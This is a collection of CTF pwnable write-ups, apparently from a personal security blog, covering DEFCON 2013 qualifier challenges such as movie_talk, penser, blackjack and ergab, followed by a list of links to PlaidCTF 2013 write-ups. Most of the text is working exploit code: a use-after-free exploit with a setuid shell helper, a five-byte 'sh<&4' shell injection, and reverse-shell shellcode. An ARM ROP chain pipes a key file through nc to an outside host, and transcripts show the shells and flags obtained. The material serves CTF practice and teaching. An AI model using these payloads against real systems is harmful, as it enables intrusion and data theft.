Category : Pwnables


movie_talk

 

Summary : signal handler, use-after-free, lift esp to argv



loader.c 

#include <stdio.h>

/*
 * Little-endian 32-bit addresses that are concatenated into args[0], the
 * first argv string handed to the target.
 * NOTE(review): every value is hard-coded, so the layout only holds while the
 * target binary and its libraries are mapped at fixed addresses; address
 * randomisation (ASLR/PIE) on the target would invalidate them.
 */

/* 0x08048bbb -- going by the name, presumably the address of a `ret`
 * instruction inside the target binary; TODO confirm. */
#define RET "\xbb\x8b\x04\x08"

/* Sixteen adjacent copies of RET, i.e. one 64-byte string literal. */
#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET

/* 0x400e4290 -- going by the name, presumably execl() in the mapped C
 * library; TODO confirm. */
#define EXECL "\x90\x42\x0e\x40"

/* 0x08048174 -- per the author's comment, the address of the string "GNU"
 * in the target image; GNU.c is the helper program of that name. */
#define BINARY "\x74\x81\x04\x08" // &"GNU"


char *args[] = {RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 
RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16   
EXECL "AAAA" BINARY, "", "", "", "", "", "", "", "", "", ""};


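/*
 * Start ./movie_talk with the prepared `args` vector as its argv and the
 * caller's environment passed through unchanged.
 *
 * NOTE(review): execve() is declared in <unistd.h>, which this listing does
 * not include, so the call relies on an implicit declaration.
 * NOTE(review): the initializer of `args` ends with "" rather than a null
 * pointer; execve() expects argv to be terminated by NULL.
 *
 * Returns 1 when the exec fails; on success execve() does not return.
 */
int main(int argc, char **argv, char **envp)
{
    (void)argc;
    (void)argv;

    execve("./movie_talk", args, envp);

    /* Only reached when the exec did not happen: report the reason instead
     * of silently falling off the end of main. */
    perror("execve");
    return 1;
}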



GNU.c

#include <stdio.h>


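/*
 * Helper program: set both the real and the effective UID to the current
 * effective UID, then replace the process image with /bin/sh.
 *
 * NOTE(review): setreuid(), geteuid() and execl() are declared in
 * <unistd.h>, which this listing does not include.
 *
 * Returns 1 when either call fails; on success execl() does not return.
 */
int main()
{
    /* A credential change that fails must not be ignored: stop rather than
     * continue with credentials other than the ones asked for
     * (cf. CERT POS37-C). */
    if (setreuid(geteuid(), geteuid()) != 0) {
        perror("setreuid");
        return 1;
    }

    /* The variadic list must end with a null *pointer*; a bare 0 is an int
     * and is not a portable sentinel where int and pointers differ in size. */
    execl("/bin/sh", "sh", (char *)NULL);

    /* Only reached when the exec failed. */
    perror("execl");
    return 1;
}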



Exploit

#!/usr/bin/python


from struct import pack

import os

import pexpect

import time


# Pack an integer as a 32-bit little-endian unsigned value ("<L").
p = lambda x : pack("<L", x)


# Hard-coded address of a gadget that, per the inline disassembly, adds 0x81bc
# to esp and returns (the "lift esp" step named in the summary).
# NOTE(review): a fixed library address like this only holds while the mapping
# on the target is not randomised; ASLR would invalidate it.
lift_esp = 0x400878c2    # add $0x81bc,%esp;  ret;


# Start the target through the loader, so its argv is the address block built
# in loader.c.
pp = pexpect.spawn("/home/movie_talk/loader")

pp.expect(".*")

# Menu option 1 ("movie addtion" in the transcript): name, rating, film rate.
pp.sendline("1")

pp.sendline("movie1")

pp.sendline("1")

pp.sendline("0")


pp.expect(".*")

# Second addition, same field order as the first.
pp.sendline("1")

pp.sendline("movie2")

pp.sendline("1")

pp.sendline("0")


# Presumably gives the target time to consume the queued input before the
# signal arrives -- TODO confirm.
time.sleep(4)

# Signal 3 is SIGQUIT. The summary names the signal handler as the way into
# the use-after-free; presumably the handler releases movie entries that the
# list still references. The handler itself is not shown on this page.
os.system("kill -3 %d" %pp.pid)


pp.expect(".*")

# Third addition: the name is the packed gadget address followed by 14 filler
# bytes (18 bytes in total). Presumably this allocation reuses the memory of a
# released entry -- TODO confirm.
pp.sendline("1")

pp.sendline(p(lift_esp)+"a"*14)

pp.sendline("1")

pp.sendline("0")


pp.expect(".*")

# Menu option 3 ("my movie list"): presumably walks the list and so touches the
# stale entry, which now holds caller-chosen bytes -- TODO confirm.
# Defensive takeaway: keep signal handlers async-signal-safe (set a flag and
# return) and clear pointers when freeing, so a list walk can never reach
# released memory.
pp.sendline("3")

pp.interact()



root@ubuntu:/home/movie_talk# ulimit -s unlimited

root@ubuntu:/home/movie_talk# ./exploit.py 

3

movie name: rating [1-100]: film rate [0,12,15,19]: 1. movie addtion

2. movie deletion

3. my movie list

4. quit

: [*] movie list =>

$ id

uid=1016(movie_talk) gid=0(root) egid=1016(movie_talk) groups=1016(movie_talk),0(root)

$         



WRITTEN BY
pwn3r_45


Category : Pwnables 


givemeshell

 

Summary : 5-byte command


Exploit

#!/usr/bin/python


from socket import *


# Address and port of the challenge service (a private lab address).
HOST = "192.168.123.134"

PORT = 7879


cmd = ""


s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

# The summary describes the service as taking a 5-byte command; "sh<&4" is
# exactly five bytes. Presumably the service hands those bytes to a shell and
# descriptor 4 is the accepted client socket, so the spawned shell reads its
# input from the connection -- TODO confirm against the service binary.
# Defensive takeaway: a length cap on data passed to a shell is not a control;
# five bytes are enough to name a shell and redirect an inherited descriptor.
s.send("sh<&4")

# Sent as a line to the shell started above: a second shell whose output is
# redirected to descriptor 4, presumably so replies come back over the socket.
s.send("sh>&4\n")

# Simple prompt loop: forward each typed line and print up to 1024 bytes of
# the reply; typing "exit" leaves the loop.
# NOTE(review): the indentation of the loop body was lost in this listing.
while 1:

cmd = raw_input("$ ")

if cmd == "exit":

break

else:

s.send(cmd+"\n")

print s.recv(1024)

s.close()



root@ubuntu:~/givemeshell# ./exploit.py 

$ id

uid=1005(givemeshell) gid=1005(givemeshell) groups=1005(givemeshell) 





WRITTEN BY
pwn3r_45



pwnable (0x41414141)

- pwnable1 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-pwnable1

- pwnable2 : (not yet)

- pwnable3 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-pwnable3

- pwnable4 : (not yet)

- pwnable5 : (not yet)


shellcode (\xff\xe4\xcc)

- shellcode1 : (not yet)

- shellcode2 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-shellcode2

- shellcode3 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-shellcode3

- shellcode4 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-shellcode4

- shellcode5 : (not yet)




WRITTEN BY
pwn3r_45


Category : Pwnable (\xff\xe4\xcc)


penser


Summary : unicode shellcode, overwrite below byte


Exploit

#!/usr/bin/python


from socket import *

from struct import pack

import time


HOST = "penser.shallweplayaga.me"

PORT = 8273


"""

51 # push %rcx

00 45 00 # align

59 # pop %rcx

00 45 00

52 # push %rdx

00 45 00

58 # pop %rax

00 45 00

32 00 # xor (%rax), %al

50 # push %rax

00 45 00

5a # pop %rdx

00 45 00

59 # pop %rcx

00 45 00

59 # pop %rcx

00 45 00

59 # pop %rcx

00 45 00

59 # pop %rcx

00 0a # add    %cl,(%rdx)          

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 45 00

58 # pop %rax

00 45 00

50 # push %rax

00 4b 00 #### will be replaced

"""

stage0 = "\x51\x45\x59\x45\x52\x45\x58\x45\x32\x50\x45\x5a\x45\x59\x45\x59\x45\x59\x45\x59\x0a\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x4b\x00\x00"


shellcode = "\x90"*0x100 +\

"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97" +\

"\x48\xb9\x02\x00\x7a\x69\x00\x00\x00\x00\x51\x48\x89\xe6" +\

"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce" +\

"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f" +\

"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48" +\

"\x89\xe6\x0f\x05"


s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

s.send("\xc3\x02\x00\x00")

time.sleep(0.5)

s.send(stage0+shellcode)

time.sleep(0.5)

s.close()




root@ubuntu:~# ./exploit.py


--------------------------------------------------------------


root@ubuntu:~# nc -lv 31337

Connection from 54.226.204.186 port 31337 [tcp/*] accepted

id

uid=1001(penser) gid=1001(penser) groups=1001(penser)

cat key

The key is: TBDHelloooookdkdkiekdiekdiek 



WRITTEN BY
pwn3r_45


Category : Pwnable (\xff\xe4\xcc)

(empty)


Summary : short shellcoding, reuse pointer in ecx


/*

00A21E80     8B09           MOV ECX,DWORD PTR DS:[ECX]

00A21E82     8D41 05        LEA EAX,DWORD PTR DS:[ECX+5]

00A21E85     66:8138 4141   CMP WORD PTR DS:[EAX],4141

00A21E8A    ^75 F4          JNZ SHORT 00A21E80

00A21E8C     C3             RETN

*/

root@ubuntu:~# (python -c 'print "\x8b\x09\x8d\x41\x05\x66\x81\x38\x41\x41\x75\xf4\xc3"')| nc linked2.shallweplayaga.me 22222

List built.  Send me your shellcode.  Max size: 16

AAAThe key is: Who says ESP isn't general purpose!?!?



WRITTEN BY
pwn3r_45


Category : Pwnable (\xff\xe4\xcc)


blackjack

 

Summary : generate shellcode with game


Exploit

#!/usr/bin/env python


import socket

import time

import thread

import re



HOST = "blackjack.shallweplayaga.me"

PORT = 6789


SHELLCODE = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

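def receiver(s):
    """Print everything received on socket ``s`` until it closes or fails.

    Meant to run in a background thread. Reads up to 1024 bytes at a time,
    prints each chunk and pauses 0.1 s between reads.

    Returns None once the peer closes the connection or the socket raises
    an error.
    """
    while True:
        try:
            data = s.recv(1024)
        except socket.error:
            # Socket closed or reset underneath us: end the thread quietly.
            # Only socket errors are caught, so unrelated failures are no
            # longer hidden by a bare ``except``.
            return
        if not data:
            # An empty read means the peer closed the connection; without
            # this check the loop would spin on empty reads forever.
            return
        print(data)
        time.sleep(0.1)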


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))

thread.start_new_thread(receiver,(s,))

time.sleep(0.5)

s.send("\x90\x0c\x90\x0c"+SHELLCODE+"\n")

s.send("65\nS\n21\nH\n1\nH\nS\n20\nS\n12\nH\nS\n1\nS\n85\nS\n85\nS\n85\nH\nS\n1\nS\n85\nS\n85\nS\n85\nS\n85\nH\nS\n1\nS\n1\nS\n85\nS\n1\nS\n85\nS\n1\nS\n85\nS\n1\nS\n85\nS\n85\nS\n85\nS\n125\nS\n60\nS\n32\nS\n1\nS\n28\nS\n1\nS\n85\nS\n85\nH\nS\n35\nH\nS\n1\nS\n23\nS\n18\nS\n-1\n")

time.sleep(0.5)

s.close()




WRITTEN BY
pwn3r_45


Category : Pwnables


ergab


Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass



gen_answer_dict.py 

import re

from socket import *

from struct import pack, unpack


HOST = "lolergab.shallweplayaga.me"

PORT = 5000


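def SaveFile(data):
    """Append ``data`` to dic.txt unless the file already contains it.

    ``data`` is one ``question:answer\\n`` record. The duplicate check is a
    plain substring search over the whole file, so a record that happens to
    be the tail of a longer stored record is also treated as present.
    """
    try:
        with open('dic.txt', 'r') as f:
            known = f.read()
    except IOError:
        # First run: the dictionary file does not exist yet. Opening it
        # read-only unconditionally would raise before anything is stored.
        known = ""

    if data in known:
        return

    # ``with`` closes the handle even if the write fails.
    with open('dic.txt', 'at') as f:
        f.write(data)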


def Attack(s):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

data = re.search('1\) (.*)', l[1])

choice = data.group(1)

s.send("1\n")

if s.recv(1024).find('Wrong!!') == -1:

SaveFile(quest + ":" + choice + "\n")

print 'OK'

return 0


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

while True:

main() 




leak_memory.py 

import re

from socket import *

from struct import pack, unpack

import time, sys


p = lambda x: pack("<L", x)


HOST = "lolergab.shallweplayaga.me"

#HOST = "192.168.0.171"

PORT = 5000


senddata = 0x3C9C


payload = ""

payload += "a"*0x0f+"\n"


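def GetDatabase():
    """Load dic.txt into a dict that maps question text to its answer.

    Every usable line has the form ``question:answer``. Lines without a
    colon (blank or damaged lines) are skipped.

    Returns the dict; raises IOError if dic.txt cannot be opened.
    """
    dic = {}
    # ``with`` closes the file even when a line cannot be processed.
    with open('dic.txt', 'r') as f:
        for line in f:
            line = line.strip('\n')
            if ':' not in line:
                # Nothing to unpack; a bare split() would raise ValueError.
                continue
            # Split on the first colon only, so a colon inside the answer
            # does not break the unpack. A colon inside the question text is
            # still ambiguous in this file format.
            (quest, answer) = line.split(':', 1)
            dic[quest] = answer
    return dic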


def Attack(s):

dic = GetDatabase()

for _ in range(5):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

answer = dic[quest]

choice = 0

for i in range(1, 4+1):

if l[i].find(answer) != -1:

choice = i

break

s.send(str(choice) + '\n')

s.recv(1024)

print s.recv(1024)

time.sleep(1)

        raw_input(">")

s.send(payload)

time.sleep(1)

print s.recv(1024)

return 0


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

main() 



Exploit

import re

from socket import *

from struct import pack, unpack

import time, sys


p = lambda x: pack("<L", x)


HOST = "lolergab.shallweplayaga.me"

PORT = 5000


base = 0xb6f54000 # server

##base = 0xb6faf000 # local

system = 0xb6cbbbd8  # server

##system = 0xb6d19bd8 # local

sleep = 0xb6d1af30 # server

freespace = 0x0000d558

senddata = 0x3C9C

recvdata = 0x3DC4

command = "cat key | nc bean.b10s.org 31337\x00"


"""

.text:000045FC 07 00 A0 E1                             MOV     R0, R7

.text:00004600 08 10 A0 E1                             MOV     R1, R8

.text:00004604 0A 20 A0 E1                             MOV     R2, R10

.text:00004608 01 40 84 E2                             ADD     R4, R4, #1

.text:0000460C 33 FF 2F E1                             BLX     R3

.text:00004610 06 00 54 E1                             CMP     R4, R6

.text:00004614 F7 FF FF 1A                             BNE     loc_45F8

.text:00004618 F8 85 BD E8                             LDMFD   SP!, {R3-R8,R10,PC}

"""



payload = ""

payload += "a"*0x10

payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC}

#############################

payload += p(base+0x00004624) # .text:00004624                 BX      LR

payload += p(0x00000000) * 2

payload += p(0x00000001)

payload += p(0x00000004) # r0

payload += p(base+freespace) # r1

payload += p(len(command)) # r2

############################

payload += p(base+0x000045FC)

############################

payload += p(0x000000de)

payload += p(0x11111111)*6

############################

#payload += p(sleep)

payload += p(base+recvdata)

###########################

payload += p(0x11111111)*7

##########################

payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC}

###########################

payload += p(base+0x00004624) # .text:00004624                 BX      LR

payload += p(0x00000000)*2

payload += p(0x00000001)

payload += p(base+freespace)

payload += p(0x00000001)*2

###########################

payload += p(base+0x000045FC)

##########################

payload += p(0x11111111)*7

##########################

payload += p(system)

##########################

payload += "\n"


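def GetDatabase():
    """Load dic.txt into a dict that maps question text to its answer.

    Every usable line has the form ``question:answer``. Lines without a
    colon (blank or damaged lines) are skipped.

    Returns the dict; raises IOError if dic.txt cannot be opened.
    """
    dic = {}
    # ``with`` closes the file even when a line cannot be processed.
    with open('dic.txt', 'r') as f:
        for line in f:
            line = line.strip('\n')
            if ':' not in line:
                # Nothing to unpack; a bare split() would raise ValueError.
                continue
            # Split on the first colon only, so a colon inside the answer
            # does not break the unpack. A colon inside the question text is
            # still ambiguous in this file format.
            (quest, answer) = line.split(':', 1)
            dic[quest] = answer
    return dic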


def Attack(s):

dic = GetDatabase()

for _ in range(5):

data = s.recv(1024)

l = data.split('\n')

quest = l[0]

answer = dic[quest]

choice = 0

for i in range(1, 4+1):

if l[i].find(answer) != -1:

choice = i

break

s.send(str(choice) + '\n')

s.recv(1024)

print s.recv(1024)

time.sleep(1)

s.send(payload)

s.send(command)

time.sleep(1)

print s.recv(1024)


def main():

s = socket(AF_INET , SOCK_STREAM)

s.connect((HOST , PORT))

Attack(s)

s.close()

if __name__ == '__main__':

main()




root@ubuntu:~# ./exploit.py


--------------------------------------------------------------------


root@ubuntu:~# nc -lv 31337

Connection from 131.247.27.200 port 80 [tcp/http] accepted

The key is: Hang on, I know what I need. Fish fingers. And custard. 




Co-written with StolenByte


WRITTEN BY
pwn3r_45



Challenges

http://shell-storm.org/repo/CTF/PlaidCTF-2013/ 


Write-up

Pwnable

----------------------------------------------------

pork 

- http://pastie.org/7693773

- http://pwn3r.tistory.com/entry/Plaid-CTF-2013-pork

- http://bases-hacking.org/pork-pctf2013.html

- http://www.bases-hacking.org/pork-pctf2013.html


ropasaurusrex

- http://hackerschool.org/temp/pctf2013/ropasaurusrex_exp.py

- http://codezen.fr/2013/04/22/plaidctf-2013-pwnable-200-ropasaurusrex-write-up/

- http://pastie.org/7693791

- http://bases-hacking.org/ropasaurusrex-pctf2013.html

http://www.bases-hacking.org/ropasaurusrex-pctf2013.html


dynrpn

- http://eindbazen.net/2013/04/pctf-2013-dynrpn-pwnable-250/

- http://pwnies.dk/post/dynrpn-plaidctf-2013/


bunyans_revenge

- http://www.blue-lotus.net/plaidctf-2013-bunyans_revenge-writeup/

----------------------------------------------------



Binary

----------------------------------------------------

three eyed fish

- http://broot.ca/blog/plaidctf-three-eyed-fish-binary-100

http://f00l.de/blog/?p=1781


cone

- http://pastie.org/private/wpxsvcxllyryl9s8ffslqw

http://eindbazen.net/2013/04/pctf-2013-cone-binary-250-2/


hypercomputer-1

- http://f00l.de/blog/?p=1803


cnot

http://www.skullsecurity.org/blog/2013/epic-cnot-writeup-plaidctf


kavihk

- http://int3pids.blogspot.nl/2013/04/plaidctf-2013-kavihk-binary-400-write-up.html

http://pwnies.dk/post/kavihk-plaidctf-2013/


drmless

- http://int3pids.blogspot.nl/2013/04/plaidctf-2013-drmless-binary-250-write.html

------------------------------------------------------



Forensic

-------------------------------------------------------

cat_rar

http://www.mikelisi.me/2013/04/plaid-ctf-2013-catrar-write-up.html

-------------------------------------------------------


Web

-------------------------------------------------------

charsheet

- http://f00l.de/blog/?p=1761


servr

- http://www.bases-hacking.org/servr-pctf2013.html

-------------------------------------------------------



Crypto

-------------------------------------------------------

blech

http://leetmore.ctf.su/wp/plaidctf-2013-blech-crypto-200/


compression

- http://www.rajatswarup.com/blog/2013/04/21/plaidctf-2013-crypto-250-compression-writeup/

- http://dave.frop.net/plaid_ctf_2013_writeup_crypto_250_compression

http://eindbazen.net/2013/04/pctf-2013-compression-crypto-250/


giga

- http://r3dey3.com/2013/04/plaid-ctf-giga-crypto-250/

- http://eindbazen.net/2013/04/pctf-2013-giga-crypto-250/


cyrpto

- http://r3dey3.com/2013/04/plaidctf-crypto100/

http://eindbazen.net/2013/04/pctf-2013-cyrpto-crypto-100/

------------------------------------------------------



Misc

-------------------------------------------------------

Unnnnlucky

- http://magic-hat.ru/forum/viewtopic.php?pid=341#p341


Prove it

- http://eindbazen.net/2013/04/pctf-2013-prove-it-misc-150/


pyjail

- http://darksaber.tk/wapiflapi/pyjail_escape.py

http://blog.pnuts.tk/2013/04/plaidctf-pyjail-story-of-pythons-escape.html

- https://blog.inexplicity.de/plaidctf-2013-pyjail-writeup-part-i-breaking-the-sandbox.html

------------------------------------------------------- 


Another write up collection 

- http://devpsc.blogspot.fr/2013/04/plaid-ctf-2013-writeups-collection.html 




Keep updating..



WRITTEN BY
pwn3r_45
